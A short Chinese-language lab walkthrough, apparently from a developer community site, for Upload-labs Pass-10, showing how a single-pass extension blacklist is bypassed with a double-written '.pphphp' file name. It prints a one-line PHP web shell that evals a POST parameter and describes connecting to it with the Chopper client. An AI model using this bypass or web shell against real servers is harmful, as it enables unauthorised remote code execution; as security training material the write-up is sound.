第十关在后端使用了黑名单 , 将匹配到的后缀名替换为空,使文件不能使用 , 但其只过滤了一遍 , 我们可以使用双写后缀名的方式绕过黑名单
准备一个 10.pphphp 文件 , 内容为一句话木马
<?php eval($_POST[-7]);?>
上传 10.pphphp 文件
后端黑名单中包含 'php' , 会将php替换为空 , 但只替换一次 , 替换后的文件名为 10.php , 仍然可以正常使用
右键 复制图片链接地址 , 并使用菜刀链接
链接成功
Upload LABS Pass-10
2021-12-30
148
版权
版权声明:
本文内容由阿里云实名注册用户自发贡献,版权归原作者所有,阿里云开发者社区不拥有其著作权,亦不承担相应法律责任。具体规则请查看《
阿里云开发者社区用户服务协议》和
《阿里云开发者社区知识产权保护指引》。如果您发现本社区中有涉嫌抄袭的内容,填写
侵权投诉表单进行举报,一经查实,本社区将立刻删除涉嫌侵权内容。
简介:
第十关在后端使用了黑名单 , 将匹配到的后缀名替换为空,使文件不能使用 , 但其只过滤了一遍 , 我们可以使用双写后缀名的方式绕过黑名单准备一个 10.pphphp 文件 , 内容为一句话木马
目录
相关文章
|
6月前
|
存储
安全
Apache
|
6月前
|
安全
PHP
|
6月前
|
安全
PHP
|
6月前
|
安全
PHP
Windows
|
6月前
|
PHP
|
6月前
|
安全
PHP
文件上传--Upload-labs--Pass19--move_upload_file()函数特性
文件上传--Upload-labs--Pass19--move_upload_file()函数特性
46
0
0
|
6月前
|
6月前
|
前端开发
安全
JavaScript
|
6月前
|
安全
PHP
|
6月前
|
安全
PHP